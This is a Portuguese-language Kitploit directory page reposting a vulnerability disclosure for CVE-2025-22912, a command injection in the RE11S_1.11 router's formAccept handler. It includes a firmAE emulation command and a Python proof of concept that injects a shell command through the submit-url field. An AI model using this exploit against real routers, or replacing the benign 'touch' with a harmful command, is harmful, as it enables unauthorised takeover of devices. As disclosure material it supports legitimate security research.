Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
RE11S_1.11-formAccept-CommandInjection — CVE-2025-22912 | Kitploit
Ferramentas/GitHubGitHub/passwa11/re11s_1.11-formaccept-commandinjection
Embedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationFuzzingPenetration TestingCommand and Control

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
passwa11/re11s_1.11-formaccept-commandinjection

RE11S_1.11-formAccept-CommandInjection

CVE-2025-22912

Ver Repositório
há 1 anoAinda não revisado

RE11S_1.11-formAccept-Injeção de Comando

Durante meu estágio no Qi An Xin Tiangong Lab, descobri uma vulnerabilidade de injeção de comando no roteador RE11S_1.11.

Ao analisar o arquivo webs no diretório bin, descobri que a função formAccept contém uma vulnerabilidade de injeção de comando.

A injeção de comando pode ser acionada pelo valor da chave submit-url, que leva a uma injeção de comando no sistema.

image-20241224100434040

Como podemos simular um roteador

Use o seguinte comando para simular com firmAE.

root@kitploit:~
sudo ./run.sh -r v1 ~/IOT/RE11S_1.11/RE11S_1.11.bin

O conteúdo do arquivo poc.py é o seguinte:

root@kitploit:~
import requests

url = "http://192.168.9.2/goform/formAccept"
data = {
	"submit-url":"touch /tmp/xyq"
}

r = requests.post(url,data=data)
print(r.text)

Resultado do ataque

image-20241224100515030

Pode-se observar que um arquivo /tmp/xyq é adicionado após a execução, o que prova que o ataque foi bem-sucedido.

Baixar ferramenta